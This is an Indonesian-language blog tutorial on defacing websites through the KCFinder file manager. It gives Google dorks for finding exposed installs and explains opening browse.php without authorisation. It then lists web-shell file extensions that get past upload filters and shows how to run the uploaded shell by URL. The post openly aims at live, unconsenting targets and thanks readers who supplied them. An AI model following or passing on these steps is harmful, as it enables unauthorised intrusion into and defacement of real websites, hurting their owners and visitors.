CARA DEFACE POC KCFINER
assalamualaikum agan-agan yang gans :v tapi masih gans saya ea :v
mumpung nganggur nih ts bkln share tutorial hack website/deface dengan metode KCFINDER ok langsung aj dri pada bnyk bacot :v
Dork :
inurl:/kcfinder/upload/files
inurl:/kcfinder/upload/images
kembangin lagi biar dpt yg freesh :v :v
ok langsung pilih salah satu dorknya lalu pastekan di mbah google :v
Next pilih salah satu webnya
oh ya sbenernya kcfinder ini ad dua cara yg pertama yaitu dengan fitur bawaan yaitu browse.php dan yg ke dua menggunakan upload.php klo mw pake yg uplaod.php harus pake csrf loh ya :v
tapi kali ini ts pake yg simple aj dah :v yaitu pke yg browse.php :v
untuk kcfinder yg pke csrf kpn2 deh ts share :v
next
ini web yang ts dapet dari hasil dorking tadi
http://www.webvuln.com/assets/kcfinder/upload/files/img_617267.jpg
ubah linkny menjadi
http://www.webvuln.com/assets/kcfinder/browse.php
nah klo vuln bkln nongol kyak gini yak :v
next upload shell kalian untuk extensi shell ane saranin pke yg di bwah ini yak :v
shell.php.fla
shell.php5
shell.php3
shell.php.x
shell.php.ndsfx
nah kalo dah ke upload tinggal panggil deh.
cara manggilnya gmna beb?:*
gampang kok :v
http://www.webvuln.com/assets/kcfinder/upload/files/nmasell.php5
ganti shell.php5 dengan shell kalian ok :*
tinggal enter deh :v
dooor...! :v
gampang kan?
kalo bingung kalian bisa comment di bawah yak :v
untuk para master mohon di simak saja yah, toh saya juga masih noob :v kalo ada kesalahan bisa komentar di bawah yak ster _/\_
TERIMAKSIH TELAH BERKUNJUNG :)
btw tq euy buat yg ngasi live targetnya :v
Bagikan
Cara deface poc KCFINDER upload shell
4/
5
Oleh
yukino afzan
